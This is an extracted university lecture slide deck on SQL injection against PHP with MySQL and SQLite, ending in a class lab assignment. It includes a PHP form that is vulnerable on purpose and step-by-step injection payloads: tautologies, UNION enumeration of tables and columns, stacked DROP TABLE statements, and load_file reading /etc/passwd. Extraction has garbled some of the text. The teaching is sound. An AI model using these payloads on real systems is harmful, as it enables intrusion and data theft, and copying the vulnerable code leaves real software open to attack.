Daniel Pittman October 17, 2011

Size: px

Start display at page:

Download "Daniel Pittman October 17, 2011"

Gavin Hardy
6 years ago
Views:

1 Daniel Pittman October 17, 2011

3 SELECT target-list FROM relation-list WHERE qualification target-list A list of attributes of relations in relation-list relation-list A list of relation names qualification Comparisons (<, >, =,,, 6=, AND, OR, NOT, etc)

4 SELECT U.user_name FROM Users U, Admins A WHERE A.user_name = U.uid AND U.first_name LIKE %Bob% ; INSERT INTO USERS (uid, user_name, first_name) VALUES (1234, chris, Chris ); DELETE FROM Users WHERE first_name LIKE '%Bob%'; DROP TABLE USERS;

5 A UNION can be used to compute the union of any two union-compatible sets Think of a UNION like an OR SELECT U.user_name FROM Users U, Admins A WHERE A.user_name = U.uid AND U.first_name LIKE %Bob% ; UNION SELECT U.user_name FROM Users U, Admins A WHERE A.user_name = U.uid AND U.first_name LIKE %Jim% ;

6 <form action="injection.php" method="post"> Want to sign up for our weekly newsletter? Enter your address below:<br><br> <input type="text" name=" _newsletter" size="80"><br><br> <input type="submit" name="sqlite_signup" value="sqlite" onclick="this.form.action='sqlite.php';"><br><br> Forgot your password? Enter your address below:<br><br> <input type="text" name=" " size="80"><br><br> <input type="submit" name="sqlite" value="sqlite" onclick="this.form.action='sqlite.php';"> <input type="submit" name="mysql" value="mysql" onclick="this.form.action='mysql.php';"> When pushing any of the submit buttons the information is posted" to one of the PHP scripts on the server.

7 PHP queries the database Parses what is returned from the query Formats information for the user Presents the information to the user This is a common point of attack for a malicious user One mistake or overlooked detail in the entire implementation can allow for the server to be compromised

${ if ($_POST['mysql']) $query = "SELECT * FROM members WHERE email = '". $email. "';"; $result = mysql_query($query); $num_rows = mysql_num_rows($result); if ($num_rows!$

8 { if ($_POST['mysql']) $query = "SELECT * FROM members WHERE = '". $ . "';"; $result = mysql_query($query); $num_rows = mysql_num_rows($result); if ($num_rows!= 0) { $row = mysql_fetch_assoc($result); echo "Your login credentials have been sent to: <br>"; echo $row[' ']; } else { echo "Your address is not listed with us."; } }

9 if ($_POST['sqlite']) { $ =$_post[' ']; $sql = "SELECT FROM members WHERE = '". $ . "'"; $res = sqlite_query($db, $sql); if (sqlite_num_rows($res)!= 0) { $row = sqlite_fetch_array($res); echo "Your login credentials have been sent to: <br>"; echo $row[' ']; } else { echo "Your address is not listed with us."; } }

$else { $email=$_post['email_newsletter']; $sql = "SELECT email FROM newsletter WHERE email = '". $email. "'"; $res = sqlite_query($db, $sql); if (sqlite_num_rows($res)!$

10 else { $ =$_post[' _newsletter']; $sql = "SELECT FROM newsletter WHERE = '". $ . "'"; $res = sqlite_query($db, $sql); if (sqlite_num_rows($res)!= 0) { $row = sqlite_fetch_array($res); echo "Your already exists: <br>"; echo $row[' ']; } else { if(sqlite_exec($db, "insert into newsletter values ('". $ . "')")) { echo " added.<br>"; } } }

11 Attacker has no knowledge of back end applications, source code, security implementations Traditional page with signup for newsletter and forgotten password prompt for members GOAL: Discover information about the underlying database, server and user information. NOTE: These demonstrations are using up to date software, not old vulnerable implementations.

12 With knowledge of SQL the attacker can guess that the underlying SQL code looks something like: SELECT fieldlist FROM table WHERE field = '$ '; $ is the variable that the user inputs into the form, expected to be an innocent address

13 The web application may construct the SQL string literally We can check to see if input is sanitized by adding an extra single quote and some noise. SELECT fieldlist FROM table WHERE field = test@test.com abc'; SQL parser finds the extra quote and aborts due to a syntax error This error response usually means input sanitization is not being done or is being done incorrectly Exploitation should be possible

14 See what information we can find out about the database Enter legal SQL code and see what happens SELECT fieldlist FROM table WHERE field = 'anything' OR 'x'='x'; 'x'='x' is guaranteed to be true no matter what, our query should succeed. Observer what happens when the query is executed Most likely this is the first record returned

15 What did the database creator name the different fields? Guess common names such as , first name, password SELECT fieldlist FROM table WHERE field = 'x' AND IS NULL; -- '; The -- is a SQL comment so the closing quote and semicolon will be ignored If output is an error message, then it is likely is not a field name If output is a success message, it is likely to be a field name Continue guessing field names

16 After step 3 the attacker knows the fieldnames to be , passwd, login id, full name There are also several approaches to this, we examine one in particular here and one later SELECT , passwd, login_id, full_name FROM table WHERE = 'x' AND 1=(SELECT COUNT(*) FROM tabname); -- '; Where tablename is the guess at what a table name is We do not care how many records, only if the name is valid

17 A UNION will allow us to add another query to the original which gives a work around to MySQL limiting the amount of queries. As we know, UNION queries must return the same number of arguments. If we had not figured it out from earlier steps it is pretty trivial Attempt with different numbers of arguments SELECT fieldlist FROM table WHERE field = 'x' UNION SELECT 1,2,3,4; -- ';

18 Can we get table name? MySQL/SQLite keep records of tables Need to walk through them one by one, we can use LIMIT SELECT fieldlist FROM table WHERE field = 'x' UNION SELECT table_name FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1; -- '; SELECT fieldlist FROM table WHERE field = 'x' UNION SELECT name FROM sqlite_master WHERE type='table' ORDER BY name limit 0,1 -- ';

19 Now we know the table name, we can use this to narrow our queries down to only the information we are interested in SELECT fieldlist FROM table WHERE field = 'x' UNION SELECT group concat(column name),2,3,4 FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name = 'members' LIMIT 0,10; -- '; SELECT fieldlist FROM table WHERE field = 'x' union SELECT sql FROM sqlite_master where name = 'members ';

20 Most SQL libraries will NOT execute multiple SQL commands at once during a query There are still avenues for exploit, however sqlite_exec If multiple statements can be executed, you can: DROP a table: x ; DROP TABLE members - CREATE a table: x ; CREATE TABLE foo (name(varchar(50)) -- INSERT data: x INSERT INTO members values ( test ) --

21 Another included MySQL command, load_file() How dangerous could that be? This function can be used to extract and view files on the server file system We need to encode the ascii as hexidecimal because of quote filtration by the function. Easily done using xxd or hexdump echo /etc/passwd hexdump C 2f f a Lets try to view /etc/passwd SELECT , passwd, login_id, full_name FROM members WHERE = 'x' UNION SELECT load_file(0x2f f ); -- ';

22 SQL databases are used everywhere on the Internet If the public interfaces to the databases are insecure, the entire database is insecure and possibly the server! Very important to follow proper procedures for designing and implementing databases Test attacks against your own implementations

Web Applications Security: SQL Injection Attack http://class.ece.iastate.edu/kothari/cpre556/lectures/ W4/Lecture%207- SQL%20Injection%20Security%20Vulnerability- January31.

23 Web Applications Security: SQL Injection Attack W4/Lecture%207- SQL%20Injection%20Security%20Vulnerability- January31.pdf Understanding MySQL Union Poisoning Course slides, Comp3421: Introduction to Database Management Systems P3421Lectures8-10.pdf

24 Thanks to Chris Neilson for developing the basis for this presentation and the assignment

Field names must match in injected queries SELECT fieldlist FROM table WHERE field = 'x' union SELECT sql as email FROM sqlite_master where name =

25 Field names must match in injected queries SELECT fieldlist FROM table WHERE field = 'x' union SELECT sql as FROM sqlite_master where name = 'members '; Space after comment - is important Warnings while performing exploit may be OK! Don t think you failed just because you see a warning on the screen

26 VPN into DU network Open browser to In MySQL, there is a table set up for each member of class Table name is CS user name Inside table is random number On the file system, in the /usr/sqlinjection folder, is a file for each member of the class File name is CS user name Inside file is another random number In MySQL, identify the table name and columns that the forgot password link accesses In SQLite, CREATE a table with your CS user name that holds an Integer Insert a random value into that table For each exploit, the EXACT commands typed into the browser, plus the output of the exploit, will be submitted

Web Security. Attacks on Servers 11/6/2017 1

Web Security. Attacks on Servers 11/6/2017 1 Web Security Attacks on Servers 11/6/2017 1 Server side Scripting Javascript code is executed on the client side on a user s web browser Server side code is executed on the server side. The server side